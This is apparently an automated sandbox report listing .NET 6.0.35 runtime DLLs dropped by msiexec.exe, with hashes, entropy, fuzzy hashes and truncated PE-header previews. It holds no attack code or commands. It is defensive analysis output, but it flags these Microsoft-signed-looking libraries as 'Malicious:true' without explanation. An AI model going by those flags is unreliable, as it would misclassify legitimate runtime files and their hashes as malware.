                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19744
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575603714433907
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aXoWX0yXQB1uXTSv/fvNRvGZYdf3zyP/weZvEydDgWvfNWZUX6HRN799R9zrJRri:1niZvVCcWF9ze
                                                                                                                                                                                                                                                                                                                                  MD5:A559E0096F62D213A900AAF749F08F5D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C37CAAF3F0FA6C6ECE9E3C98E905FFF921AF1C
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B5BD709929BE586FA1B95B7066C3A4AD9B5462FB1F7714BB39E6DDFD3B54148
                                                                                                                                                                                                                                                                                                                                  SHA-512:B9803794E42E984BA841D5A32BE8553FEB9CABED2E59866B35E73D3AF3641FA9D60207F98254BA923F9B9AA902BF08941B545F19310B4596CD097B01F22FBB7B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7.(..........." ..0..............9... ...@....... ...................................`..................................9..O....@...............$.. )...`.......8..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ......................88......................................BSJB............v4.0.30319......l.......#~......h...#Strings............#US.........#GUID.......P...#Blob............T.........3....................................h.....D...............s.......|...............D.z...............Z.................0.....M.................<............."...,...................v.....v.....v...).v...1.v...9.v...A.v...I.v...Q.v...Y.v...a.v...i.v...q.v...y.v.....v. ...v.....v...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):156936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5995271738923975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:h3J/DYsIem43AYT+a5TfaEPvbKwUJmOaYIEipy50K:X/DyWqaFCGmdIcIEbb
                                                                                                                                                                                                                                                                                                                                  MD5:7710279322A362C928BF36639EFFBF81
                                                                                                                                                                                                                                                                                                                                  SHA1:2B679CA3058DC2A5C90F40D3C1A98C9553098AAC
                                                                                                                                                                                                                                                                                                                                  SHA-256:1842EFE9037300ECE2E81E40EC000FA9338A4C786CBCFED0B47DD05B1C4E77EB
                                                                                                                                                                                                                                                                                                                                  SHA-512:085C7342AECA9F65B9E3774BF2E84AC9D703D66F764678ABC79A1AB8D5F82BE59B50BA97B53303956F2DEB055553B419E91DE8002E8D219FB38AD933EC802ADD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........$...............................................`............`...@......@............... .......................................<.......<...)...P......h...T...............................................................H............text............................... ..`.data........0... ..................@....reloc.......P.......8..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24336
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.299107673471786
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:/sIbPFWOUSnPEW51b04H9DGMq/tE8aQjryAkxkBm4U1zXtrC1IIKrWXi2WUYA6VJ:/vPFWOUSnP751b04H9DGMq/tE8aQjryz
                                                                                                                                                                                                                                                                                                                                  MD5:9354C7BD9F23D4899200DAAA3BE37296
                                                                                                                                                                                                                                                                                                                                  SHA1:440D5E15680AB4BCCDD656E598A12C8884A56390
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D934AB5109749874D2FC86A356DB68DF98DE7F1A5857E3F2B8744173B1B8D5
                                                                                                                                                                                                                                                                                                                                  SHA-512:3549F0275E7C848EB7E3E3EB7B881C846F73D3F8448C3F5032E10A49A245D7310D3643B6A605A55DA88CC90F3DC6F132A26812A763580B0B36A81B8CC4AC3932
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>............" ..0..,...........J... ...`....... ....................................`.................................CJ..O....`..8............6...)..........tI..T............................................ ............... ..H............text....*... ...,.................. ..`.rsrc...8....`......................@..@.reloc...............4..............@..B................wJ......H.......P ...(...................H......................................BSJB............v4.0.30319......l.......#~..........#Strings.....%......#US..%......#GUID....%......#Blob............T.........3............................................................................1.N...c.................y.....0...........].....z...................................K...................[.....[.....[...).[...1.[...9.[...A.[...I.[...Q.[...Y.[...a.[...i.[...q.[...y.[.....[. ...[.....[...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2983584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.807191200324224
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:TyNlk2vtvXwQdjfbPQ+EPba92I7aE0Vnv1XgVi4nNmch7cDpBsKTzkt2BeE:T+VdLX3Sv
                                                                                                                                                                                                                                                                                                                                  MD5:E6421C7A5CF51CB5B5706BF00AA01B4F
                                                                                                                                                                                                                                                                                                                                  SHA1:12876E56B267E945FB709D9B5703009872D1A4F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:272042F39223A4445CCCAAE2490C8291CBA723A1C30B61DB7603C218C69216E1
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8597038DEFDD8BC8ED07BF56903E7E85D4B427973C473F60920EE53AB04CBFD7BCA488AFC5B659116BFA62A3B95769A690496A34B95647DA1F1E65E13217E6D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...].q..........." .....r+...................................................-......m....`...@......@............... ..................................t...@&...K...^-..(...`-..&......T...........................................................x...H............text...7p+......r+................. ..`.data.........+......t+.............@....reloc...&...`-..(...6-.............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.a.t.a...C.o.m.m.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.668996319122586
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ulguSZJRWaJ7WzX6HRN7nVXC4deR9zVjxMY:TuWQWnVXC4dC9zVjd
                                                                                                                                                                                                                                                                                                                                  MD5:3E2A4F4D06E78AE1F2972A92F475C059
                                                                                                                                                                                                                                                                                                                                  SHA1:7ED79074D8F081398FA9119D20F475EF2A162814
                                                                                                                                                                                                                                                                                                                                  SHA-256:5B509E7AB8FC8FA00C722ABFDDDB37C1BDE182270D9A3030B785751910F3DFB3
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DB1D000C9C5F130BEBF73EB8144495467A3D87165F6C94DBED18D4E709ACDBC787DC42AFA13D859EF70D441F3BDAD9979D96AA356439CBAA4BB8362E7F58ABF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"!..0..............)... ........@.. ....................................`..................................)..O....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ .. ...................P ......................................4..'..E....[..y.].%k.tT.*mT`Gf...#.y..=..1....%_....B_.J.I..C...rq..F..{.v.....r.9~7sMFL..]6..K.iz .I..9 .......|......)|BSJB............v4.0.30319......`...H...#~......X...#Strings............#GUID...........#Blob......................3................................................E...............................:...'.A...i.A.....A...~.A.....A.....A.....A...e.A.....A...........E.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25864
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.25146842792214
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aBaJC9XmGP2SoxDZQj/6YWiXFW5YA6VFHRN7JKdpR9z+pttXEv:awsXmJDZQ7EFCluD9zWjXe
                                                                                                                                                                                                                                                                                                                                  MD5:457D34A9E93C95B0E0927741C43C706F
                                                                                                                                                                                                                                                                                                                                  SHA1:56C5AE9397D703F211CBF109CFC86EA5AE16DFCB
                                                                                                                                                                                                                                                                                                                                  SHA-256:434C2AEAEC2DED6A904FF16256412128FC0FA57DC6B54A1626E8F4558A14646B
                                                                                                                                                                                                                                                                                                                                  SHA-512:DD8759ED49410BB0086638A9101DF294D4A67C56ACC4509B26FC6DC136FE8A194E76747261218EED92E5DCB47365FD91262D1D8D38CA6F47B2B4BACD82E811CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..2...........P... ...`....... ....................................`..................................P..O....`..8............<...)...........O..T............................................ ............... ..H............text....0... ...2.................. ..`.rsrc...8....`.......4..............@..@.reloc...............:..............@..B.................P......H.......P ......................HO......................................BSJB............v4.0.30319......l.......#~......0...#Strings.... ,......#US.$,......#GUID...4,......#Blob............T.........3....................................<.....[...............:.................A...........o...........!...........R.....Z.....w............................... ...........#...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.794991722289914
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:9WxAgNW6i2Wp/X6HRN7AtIJVXC4deR9zVjxX:98m1WQgVXC4dC9zVjF
                                                                                                                                                                                                                                                                                                                                  MD5:E815C8AE914EE40BF8D404FCA79D5753
                                                                                                                                                                                                                                                                                                                                  SHA1:1E754EEC56B0762A99640B3B5537CB6F1FA81AE7
                                                                                                                                                                                                                                                                                                                                  SHA-256:89E4C33A4B7BA60A748A9EA3D5D1413AF0AB63CD29117F159FDCEF5779BD9359
                                                                                                                                                                                                                                                                                                                                  SHA-512:654D7B3AEFA8C29002247DB18807DF777421C94FC8E6ED4C8C013EC5828F142581DE45D2A1132C8D6BE7A2DEEEE2ED0F60F19EC78B94905245E3E5A52D23A67D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{..........."!..0..............+... ........@.. ....................................`..................................+..W....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ........................................)^.O..(.+sY.R.T...!%s.R...F4}c..X..@..1..sh....}...........e..Enr....F..P..."...N......."l......S..^ zs...R/o..`@..i...h..;BSJB............v4.0.30319......`.......#~......H...#Strings....8.......#GUID...H.......#Blob......................3......................................Z.........9.........................,.....{.........F...........5.............................#.....p.........................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.771179430350626
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:k1b2xx+3kW2SmWypWjA6Kr4PFHnhWgN7agW5IhHssDX01k9z3AGWPsU:5o0W2SmWyYA6VFHRN7gIFDR9z7WP1
                                                                                                                                                                                                                                                                                                                                  MD5:CB70708DCDFC6E40B8D57703AC186C6B
                                                                                                                                                                                                                                                                                                                                  SHA1:EE450F4D1EA1419E80725CF0ADD7CCC0F422285D
                                                                                                                                                                                                                                                                                                                                  SHA-256:0E2F8A41ABB218127967B9B63F7D88B2472AF27776A95F6F616D1E4F0068FB36
                                                                                                                                                                                                                                                                                                                                  SHA-512:35C7BEE29F8D1B1B6825EE4C7EABE4EEB15D9925F204720D22BFB4FE5CBDC7E48D5454E40E14E3D14291ABD69E27C44C4FB2B0CA0FEF5EDC263C1130CE716A0A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$2............"!..0.............n+... ........@.. ..............................p.....`..................................+..W....@...................)...`......`*..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P+......H........ ......................P .........................................Z..}P..).1.:.|..x^s.T:..'(i@.:.~~r(.j1.U.K....e.X.....9K...6...{..N.k~h._.f...U..T*s..en.)G..y/<._...!....}j.< ..\.....fBSJB............v4.0.30319......`...t...#~..........#Strings............#GUID...........#Blob......................3............................................................o...................4.................;...8.;...].;.....;...F.;.....;... .;.....;.....;.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):380576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.735643509984664
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:xNrYIYO/3uqTtasHnkWg62wafPoSVsybyCrEVYEHJ01TxJS:jV3ukBkwoPACrEVtKfE
                                                                                                                                                                                                                                                                                                                                  MD5:FFC6107F4CF962DECA6085FD6D6943E8
                                                                                                                                                                                                                                                                                                                                  SHA1:DA6366AA3DCF4862A4A110BEFF4EE185D64BD5DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:394B562E8F1B4A2D75C86A0CCC26434A9965AE478A81978700A510005A987B81
                                                                                                                                                                                                                                                                                                                                  SHA-512:158D082C2377CFACBCEA79733C6023555B715061004ECE84998A9C5E86B63ED9F451A91946E60EB38FE915C7BEB44534F18FDE8C3FF7AD9E15233AE8743B4955
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...w.B..........." ................................................................8^....`...@......@............... ......................................`....+.......(.......... )..T...............................................................H............text............................... ..`.data....}...0...~..................@....reloc..............................@..B............................................0...........................X.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .C.l.a.s.s.e.s. .t.h.a.t. .a.l.l.o.w. .y.o.u. .t.o. .d.e.c.o.u.p.l.e. .c.o.d.e. .l.o.g.g.i.n.g. .r.i.c.h. .(.u.n.s.e.r.i.a.l.i.z.a.b.l.e.). .d.i.a.g.n.o.s.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.488510148250486
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:tWdVV9WzoyY50a+3ZgW1n6lsLiKqFCM1nTrmowCwZ0oEmLnYA6VFHRN7gFDR9z7Q:0a1pgW9LiKqFCM1n2owXZZlFClkl9zaz
                                                                                                                                                                                                                                                                                                                                  MD5:9A9B46B21F1CC90D9E398AEE76CB831C
                                                                                                                                                                                                                                                                                                                                  SHA1:8BFC832B73D619C6AB4D83CEB563620EAD601A80
                                                                                                                                                                                                                                                                                                                                  SHA-256:62FA26059B49F049A5F3DD63984E2BEC531999B12659713FD9E673A3CDC49FDB
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF15A0AA31DB2525A10A6AAC6DFBF383BF441200BB9C39DCEE4A6BE690434EA3C061D9870A39B9F3AC190952FB61C1859D856784F9A43249A0338FB737C9A787
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...tO............" .....X................................................................`...@......@............... ..................................t...8........b...)......T.......T...........................................................x...H............text....W.......X.................. ..`.data........p.......Z..............@....reloc..T............`..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):290568
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6831877089166865
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jzvmR+TsVz/xZOkeijuG3yxs9b3NX1PkxBqqS7s03sx5Z+:jzeQTsVz/xjXjuGCjDr03sx5I
                                                                                                                                                                                                                                                                                                                                  MD5:29C2F7BBC8B17C8787ABB4D7EDC11DC6
                                                                                                                                                                                                                                                                                                                                  SHA1:79A2F9ABB8F4FED3A75962E21A8A0064F4633DB3
                                                                                                                                                                                                                                                                                                                                  SHA-256:B5AD22BF61562E5335CAB0D16233485F1E01B21556EEFA2F47E1C3E8FD5F6BF2
                                                                                                                                                                                                                                                                                                                                  SHA-512:A9C9EBBD52A4CF5C52D94F3810E21899C931BACE4C20B2923D26193F319BB07E23DDEF26B759EA45D31BAB9913421A99A772CA55918FAB4172C350BF605A96AA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....V............" .........P...............................................p......*q....`...@......@............... ..................................D....m...!...F...)...`......@&..T...........................................................H...H............text............................... ..`.data....H.......J..................@....reloc.......`.......@..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):36616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.537255863264118
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:yt4gYfq6ejoniqkwx38n9Is/mjSTsssssssss4FCl3MFT9zC:yLYfq6ejoniqjx38n9IbjSzi8TzC
                                                                                                                                                                                                                                                                                                                                  MD5:C192A6B88DCA4AFD2A042C79A68155CC
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A8B843D0735377C6A127565721019E54365D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:27DD8C3DC2F22B40CFA443FC7B9A33520CEEC581A158042E9DD2451507A58105
                                                                                                                                                                                                                                                                                                                                  SHA-512:85B8E16B9BED456735B422FE726FFA1D3AC7FF5718F017E60829E3245DC1F454F077976E1140B168BC0D261D94B0636A2B4BC9918BBEB486B8A388BF0108E9F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....d..........." .....Z.......................................................... .....`...@......@............... ...............................................f...)..............T...............................................................H............text....X.......Z.................. ..`.data...~....p.......\..............@....reloc...............d..............@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...S.t.a.c.k.T.r.a.c.e...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):60688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.543709261391772
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HeWtDQZ7Fa+dddvw3hfgBsUbmoSNI8QUQXECIDoFI0yFjONFClrl9zs9:+DFaKddOtJI8GvJOHYir3zs9
                                                                                                                                                                                                                                                                                                                                  MD5:DEA179B29697ECAA3FA3199ECF9AC997
                                                                                                                                                                                                                                                                                                                                  SHA1:8AA7795711ECE9BDCC1A57CC548A7585FBD644B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:583A5581861E0511ED7B0E2EAC14B4298B05C3E1FAEFD65318C6EDC78C4265F0
                                                                                                                                                                                                                                                                                                                                  SHA-512:B2CE8996D1A554A8D20BD45B2AFF84D29EC012963CB4F5EC2DFB09C6BD12F07BB46CB03F657EB4FCA47A8AE21A4ECC0CEE33367A9F183A6828291A07D07DC1D6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
